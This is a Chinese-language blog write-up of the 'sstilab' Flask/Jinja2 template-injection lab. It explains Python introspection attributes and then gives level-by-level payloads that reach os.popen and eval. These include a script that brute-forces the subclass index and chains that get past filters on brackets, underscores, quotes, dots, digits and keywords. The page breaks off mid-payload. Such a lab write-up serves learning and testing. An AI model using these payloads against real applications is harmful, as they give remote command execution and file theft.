

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="Flask来源：https:&#x2F;&#x2F;xz.aliyun.com&#x2F;t&#x2F;12181#toc-8 笔记魔法方法__class__用来查看变量所属的类，根据前面的变量形式可以得到其所属的类。 是类的一个内置属性，表示类的类型； 也是类的实例的属性，表示实例对象的类。例：[].__class__ __bases__用来查看类的基类，也可以使用数组索引来查看特定位置的值。 通过该属性可以查看该类的所有直接父类，该">
<meta property="og:type" content="article">
<meta property="og:title" content="2023&#x2F;7&#x2F;28：sstilab记录">
<meta property="og:url" content="http://example.com/2023/07/28/sstilab/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Flask来源：https:&#x2F;&#x2F;xz.aliyun.com&#x2F;t&#x2F;12181#toc-8 笔记魔法方法__class__用来查看变量所属的类，根据前面的变量形式可以得到其所属的类。 是类的一个内置属性，表示类的类型； 也是类的实例的属性，表示实例对象的类。例：[].__class__ __bases__用来查看类的基类，也可以使用数组索引来查看特定位置的值。 通过该属性可以查看该类的所有直接父类，该">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2023-07-28T14:04:41.000Z">
<meta property="article:modified_time" content="2023-08-11T10:48:39.160Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>2023/7/28：sstilab记录 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="2023/7/28：sstilab记录"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-07-28 22:04" pubdate>
          July 28, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.9k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          67 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">2023/7/28：sstilab记录</h1>
            
            
              <div class="markdown-body">
                
                <p>Flask<br>来源：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12181#toc-8">https://xz.aliyun.com/t/12181#toc-8</a></p>
<h2 id="笔记"><a href="#笔记" class="headerlink" title="笔记"></a>笔记</h2><h3 id="魔法方法"><a href="#魔法方法" class="headerlink" title="魔法方法"></a>魔法方法</h3><p><code>__class__</code><br>用来查看变量所属的类，根据前面的变量形式可以得到其所属的类。 是类的一个内置属性，表示类的类型； 也是类的实例的属性，表示实例对象的类。<br>例：<code>[].__class__</code></p>
<p><code>__bases__</code><br>用来查看类的基类，也可以使用数组索引来查看特定位置的值。 通过该属性可以查看该类的所有直接父类，该属性返回所有直接父类组成的元组。<br>例：<code>[].__class__.__bases__</code></p>
<p><code>__mro__</code><br>获取基类，包含了当前类对象所有继承的基类<br>例：<br><code>&#39;&#39;.__class__.__mro__</code><br><code>&#39;&#39;.__class__.__mro__[-1]</code></p>
<p><code>__subclasses__()</code><br>获取当前类的所有子类，即Object的子类。通过拿到Object的子类，使用其中的一些函数，进行文件读取或者命令执行。<br>例：<code>&#39;&#39;.__class__.__mro__[-1].__subclasses__()</code></p>
<p><code>__init__</code><br>重载子类，获取子类初始化的属性</p>
<p><code>__globals__</code><br>函数会以字典的形式返回当前位置的全部全局变量<br>例：<code>os._wrap_close.__init__.__globals__</code>   可以获取到os中的一些函数，进行文件读取。</p>
<p><code>lipsum</code><br>可以用于获得<code>__builtins__</code>，<code>lipsum.__globals__</code>有os模块<br><code>&#123;&#123;(lipsum|string|list)&#125;&#125;</code>能获得字符位置</p>
<h3 id="解题示例"><a href="#解题示例" class="headerlink" title="解题示例"></a>解题示例</h3><p><del>因某种原因构造出来的payload无法直接使用，需要逐个输入魔法方法</del><br>直接从github下载的sstilab会出现flask和jinja2的兼容版本问题，在windows上直接使用作者留下的安装方式不会出现报错，但在ubuntu上会提示无法导入escape模块</p>
<h4 id="1：一句话"><a href="#1：一句话" class="headerlink" title="1：一句话"></a>1：一句话</h4><figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">for</span> c <span class="hljs-keyword">in</span> <span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__() <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">if</span> c.__name__==<span class="hljs-string">&#x27;catch_warnings&#x27;</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123; c.__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>].eval(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;dir&#x27;).read()&quot;</span>)&#125;&#125;</span><span class="language-xml">//依不同题目替换此行</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">endif</span> <span class="hljs-template-tag">%&#125;</span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">endfor</span> <span class="hljs-template-tag">%&#125;</span><br></code></pre></td></tr></table></figure>
<h4 id="2：脚本"><a href="#2：脚本" class="headerlink" title="2：脚本"></a>2：脚本</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://127.0.0.1:5000/level/1&quot;</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">300</span>):<br>    data = &#123;<span class="hljs-string">&quot;code&quot;</span>: <span class="hljs-string">&#x27;&#123;&#123;&quot;&quot;.__class__.__base__.__subclasses__()[&#x27;</span>+ <span class="hljs-built_in">str</span>(i) +<span class="hljs-string">&#x27;]&#125;&#125;&#x27;</span>&#125;<br>    <span class="hljs-keyword">try</span>:<br>        response = requests.post(url,data=data)<br>        <span class="hljs-comment">#print(data)</span><br>        <span class="hljs-comment">#print(response.text)</span><br>        <span class="hljs-keyword">if</span> response.status_code == <span class="hljs-number">200</span>:<br>            <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;_wrap_close&quot;</span> <span class="hljs-keyword">in</span> response.text:<br>                <span class="hljs-built_in">print</span>(i,<span class="hljs-string">&quot;-----&gt;&quot;</span>,response.text)<br>                <span class="hljs-keyword">break</span><br>    <span class="hljs-keyword">except</span> :<br>        <span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>
<p>构造出来的payload示例：</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">&#x27;&#x27;.__class__.__base__.__subclasses__</span>()[147].__init__.__globals__[&#x27;popen&#x27;](<span class="hljs-name">&#x27;type flag&#x27;</span>).read()&#125;&#125;</span><br></code></pre></td></tr></table></figure>
<h2 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h2><p>如以上解题示例2所示，先输入</p>
<figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sqf"><span class="hljs-string">&quot;&quot;</span>.<span class="hljs-variable">__class__</span>.<span class="hljs-variable">__base__</span>.<span class="hljs-variable">__subclasses__</span>()<br></code></pre></td></tr></table></figure>
<p>获得当前所有子类列表，使用脚本选择os._wrap_close，为147，选择函数popen执行查看文件命令，最后使用read()读取</p>
<h2 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h2><p>输入检测得知<code>&#123;&#123;`被WAF防御，需要进行替代
可使`&#123;&#123;%print(...)%&#125;&#125;</code>方式代替<code>&#123;&#123;&#125;&#125;`，余下步骤相同
## level 3（做不出来）
仅会显示输入的语句是否正确
查看下wp
需要使用dnslog外带，也可使用nc命令将文件回显到自己服务器上
但似乎跟前面一样，若构造完整的payload直接输入无法的到结果，之前可能显示“no this level”或者“Hello  ”
## level 4
过滤了`[]`
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-built_in">__getitem</span>()__返回所给的键对应的值，代替索引的<span class="hljs-selector-attr">[]</span><br>__getattribute__获取对象属性或方法，代替魔术方法的<span class="hljs-selector-attr">[]</span><br></code></pre></td></tr></table></figure>
payload:
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">&#x27;&#x27;.__class__.__base__.__subclasses__</span>().__getitem__(<span class="hljs-name">147</span>).__init__.__globals__.__getitem(<span class="hljs-name">&#x27;popen&#x27;</span>)(<span class="hljs-name">&#x27;type flag&#x27;</span>).read()&#125;&#125;</span><br></code></pre></td></tr></table></figure>
## level 5
过滤“\”“' "”
<figure class="highlight maxima"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs maxima">request.<span class="hljs-built_in">args</span>:Flask框架中的特殊参数，接受URL地址中的变量数据，此处我们就可以通过构造带参数的url,配合request.<span class="hljs-built_in">args</span>获取构造参数的内容来绕过限制<br></code></pre></td></tr></table></figure>
paylaod:
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="language-xml">POST:</span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__base__.__subclasses__</span>()[147].__init__.__globals__[request.args.a](<span class="hljs-name">request.args.b</span>).read()&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml">GET:a=popen&amp;b=type flag</span><br></code></pre></td></tr></table></figure>
## level 6
过滤“_”
需对“_”进行十六进制编码（\x5f）后结合过滤器连接绕过
过滤器：过滤器通过管道符号（|）与变量连接，并且在括号中可能有可选的参数；可以链接到多个过滤器.一个滤波器的输出将应用于下一个过滤器
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">length</span><span class="hljs-params">()</span></span>获取一个序列或者字典的长度并将其返回<br><span class="hljs-function"><span class="hljs-title">int</span><span class="hljs-params">()</span></span>将值转换为int类型；<br><span class="hljs-function"><span class="hljs-title">float</span><span class="hljs-params">()</span></span>将值转换为<span class="hljs-attribute">float</span>类型；<br><span class="hljs-function"><span class="hljs-title">lower</span><span class="hljs-params">()</span></span>将字符串转换为小写；<br><span class="hljs-function"><span class="hljs-title">upper</span><span class="hljs-params">()</span></span>将字符串转换为大写；<br><span class="hljs-function"><span class="hljs-title">reverse</span><span class="hljs-params">()</span></span>反转字符串；<br><span class="hljs-function"><span class="hljs-title">replace</span><span class="hljs-params">(value,old,new)</span></span>将value中的old替换为new<br><span class="hljs-function"><span class="hljs-title">list</span><span class="hljs-params">()</span></span>将变量转换为列表类型；<br><span class="hljs-function"><span class="hljs-title">string</span><span class="hljs-params">()</span></span>将变量转换成字符串类型；<br><span class="hljs-function"><span class="hljs-title">join</span><span class="hljs-params">()</span></span>将一个序列中的参数值拼接成字符串，通常有python内置的<span class="hljs-built_in">dict</span>()配合使用；<br><span class="hljs-function"><span class="hljs-title">attr</span><span class="hljs-params">()</span></span>获取对象的属性；<br></code></pre></td></tr></table></figure>
payload:
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;()|<span class="hljs-name">attr</span>(<span class="hljs-name">&quot;\x5f\x5fclass\x5f\x5f&quot;</span>)|attr(<span class="hljs-name">&quot;\x5f\x5fbase\x5f\x5f&quot;</span>)|attr(<span class="hljs-name">&quot;\x5f\x5fsubclasses\x5f\x5f&quot;</span>)()|attr(<span class="hljs-name">&quot;\x5f\x5fgetitem\x5f\x5f&quot;</span>)(<span class="hljs-name">147</span>)|attr(<span class="hljs-name">&quot;\x5f\x5finit\x5f\x5f&quot;</span>)|attr(<span class="hljs-name">&quot;\x5f\x5fglobals\x5f\x5f&quot;</span>)|attr(<span class="hljs-name">&quot;\x5f\x5fgetitem\x5f\x5f&quot;</span>)(<span class="hljs-name">&#x27;popen&#x27;</span>)(<span class="hljs-name">&#x27;type flag&#x27;</span>)|attr(<span class="hljs-name">&quot;read&quot;</span>)()&#125;&#125;</span><span class="language-xml"> </span><br></code></pre></td></tr></table></figure>
这次倒是正常出现flag了
## level 7
过滤了“.”
利用“[]”绕过
payload:
<figure class="highlight prolog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs prolog">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;__class__&#x27;</span>][<span class="hljs-string">&#x27;__base__&#x27;</span>][<span class="hljs-string">&#x27;__subclasses__&#x27;</span>]()[<span class="hljs-number">147</span>][<span class="hljs-string">&#x27;__init__&#x27;</span>][<span class="hljs-string">&#x27;__globals__&#x27;</span>][<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&#x27;type flag&#x27;</span>)[<span class="hljs-string">&#x27;read&#x27;</span>]()&#125;&#125;<br></code></pre></td></tr></table></figure>
单引号改()显示no this level
## level 8
过滤关键字：class arg form value data request init global open mro base attr
方法如下：
<figure class="highlight prolog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs prolog"><span class="hljs-number">1.</span>字符串拼接<br><span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;__clas&#x27;</span><span class="hljs-string">&#x27;s__&#x27;</span>][<span class="hljs-string">&#x27;__ba&#x27;</span><span class="hljs-string">&#x27;se__&#x27;</span>][<span class="hljs-string">&#x27;__subc&#x27;</span><span class="hljs-string">&#x27;lasses__&#x27;</span>]()[<span class="hljs-number">147</span>][<span class="hljs-string">&#x27;__in&#x27;</span><span class="hljs-string">&#x27;it__&#x27;</span>][<span class="hljs-string">&#x27;__glo&#x27;</span><span class="hljs-string">&#x27;bals__&#x27;</span>][<span class="hljs-string">&#x27;po&#x27;</span><span class="hljs-string">&#x27;pen&#x27;</span>](<span class="hljs-string">&#x27;type flag&#x27;</span>)[<span class="hljs-string">&#x27;read&#x27;</span>]()<br>或：<br>&#123;<span class="hljs-comment">%set a=&quot;__cla&quot;%&#125;&#123;%set aa=&quot;ss__%&#125;&#123;&#123;a~aa&#125;&#125;</span><br><span class="hljs-number">2.</span>使用过滤器，如join()拼接字符串、reverse()反转字符串、replace()替换字符<br><span class="hljs-number">3.</span>编码<br></code></pre></td></tr></table></figure>
## level 9
过滤数字
方法1：使用getitem避免索引
方法2；使用过滤器length()将字符长度转换为数字
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">for</span> c <span class="hljs-keyword">in</span> <span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__() <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">if</span> c.__name__==<span class="hljs-string">&#x27;catch_warnings&#x27;</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123; c.__init__.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>].eval(<span class="hljs-string">&quot;__import__(&#x27;os&#x27;).popen(&#x27;dir&#x27;).read()&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">endif</span> <span class="hljs-template-tag">%&#125;</span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">endfor</span> <span class="hljs-template-tag">%&#125;</span><br></code></pre></td></tr></table></figure>
## level 10
过滤config，没有全局变量，目标变为获取config文件
可使用变量current_app
current_app：允许在应用程序上下文之外访问应用程序对象，如当前请求的应用程序实例。通过current_app变量，可以访问Flask应用程序对象的各种属性和方法，如配置信息、扩展和插件等。
payload:
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">get_flashed_messages.__globals__</span>[&#x27;current_app&#x27;].config&#125;&#125;</span><br></code></pre></td></tr></table></figure>
关于url_for方法：定位，如返回`<class 'str'>`
关于get_flashed_message：可显示字符返回信息，需调用flash()
## level 11
过滤“\”，“+”，“request”，“[ ]”，“" '”
引号过滤：`&#123;%set a=dict(__cla=a,ss__=b)|join%&#125;&#123;&#123;()|attr(a)&#125;&#125;</code></p>
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="language-xml">原构造链：</span><br><span class="language-xml">().__class__.__base__.__subclasses__()[139].__init__.__globals__[&#x27;popen&#x27;](&#x27;type flag&#x27;).read()</span><br><span class="language-xml"></span><br><span class="language-xml">payload：</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> a=dict(__cla=a,ss__=b)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"># __class__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> b=dict(__bas=a,e__=b)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"># __base__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> c=dict(__subcla=a,sses__=b)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"># __subclasses__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> d=dict(__ge=a,titem__=a)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span><span class="hljs-template-tag">%&#125;</span><span class="language-xml"># __getitem__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> e=dict(__in=a,it__=b)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"># __init__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> f=dict(__glo=a,bals__=b)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"># __globals__</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> g=dict(pop=a,en=b)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"># popen</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> h=self<span class="hljs-punctuation">|</span>string<span class="hljs-punctuation">|</span>attr(d)(<span class="hljs-number">18</span>)<span class="hljs-template-tag">%&#125;</span><span class="language-xml"># 空格</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> i=(dict(type=abc)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span>,h,dict(flag=b)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span>)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span><span class="hljs-template-tag">%&#125;</span><span class="language-xml"># type flag</span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> j=dict(read=a)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span><span class="hljs-template-tag">%&#125;</span><span class="language-xml"># read</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-punctuation">|</span>attr(a)<span class="hljs-punctuation">|</span>attr(b)<span class="hljs-punctuation">|</span>attr(c)()<span class="hljs-punctuation">|</span>attr(d)(<span class="hljs-number">139</span>)<span class="hljs-punctuation">|</span>attr(e)<span class="hljs-punctuation">|</span>attr(f)<span class="hljs-punctuation">|</span>attr(d)(g)(i)<span class="hljs-punctuation">|</span>attr(j)()&#125;&#125;</span><span class="language-xml"># 拼接</span><br></code></pre></td></tr></table></figure>
<h2 id="level-12"><a href="#level-12" class="headerlink" title="level 12"></a>level 12</h2><p>过滤“_”，“.” ，“\” “’ “”，“[ ]”和数字<br>构造链：<code>&#123;&#123;x.__init__.__globals__['__builtins__']&#125;&#125;</code></p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="language-xml">payload:</span><br><span class="language-xml">get:</span><br><span class="language-xml">?z=__init__&amp;zz=__globals__&amp;zzz=__builtins__&amp;zzzz=eval&amp;zzzzz=__import__(&#x27;os&#x27;).popen(&#x27;type flag&#x27;).read()</span><br><span class="language-xml">post:</span><br><span class="language-xml">&#123;%set a=&#123;&#125;|select|string|list%&#125;</span><br><span class="language-xml">&#123;%set b=dict(pop=a)|join%&#125;</span><br><span class="language-xml">&#123;%set c=a|attr(b)(self|string|length)%&#125;  </span><br><span class="language-xml">&#123;%set d=(c,c,dict(getitem=a)|join,c,c)|join%&#125; </span><br><span class="language-xml">&#123;%set e=dict(args=a)|join%&#125;   </span><br><span class="language-xml">&#123;%set f=dict(get=a)|join%&#125;    </span><br><span class="language-xml">&#123;%set g=dict(z=a)|join%&#125;        </span><br><span class="language-xml">&#123;%set gg=dict(zz=a)|join%&#125;</span><br><span class="language-xml">&#123;%set ggg=dict(zzz=a)|join%&#125;</span><br><span class="language-xml">&#123;%set gggg=dict(zzzz=a)|join%&#125;</span><br><span class="language-xml">&#123;%set ggggg=dict(zzzzz=a)|join%&#125;</span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">x</span>|attr(<span class="hljs-name">request</span>|attr(<span class="hljs-name">e</span>)|attr(<span class="hljs-name">f</span>)(<span class="hljs-name">g</span>))|attr(<span class="hljs-name">request</span>|attr(<span class="hljs-name">e</span>)|attr(<span class="hljs-name">f</span>)(<span class="hljs-name">gg</span>))|attr(<span class="hljs-name">d</span>)(<span class="hljs-name">request</span>|attr(<span class="hljs-name">e</span>)|attr(<span class="hljs-name">f</span>)(<span class="hljs-name">ggg</span>))|attr(<span class="hljs-name">d</span>)(<span class="hljs-name">request</span>|attr(<span class="hljs-name">e</span>)|attr(<span class="hljs-name">f</span>)(<span 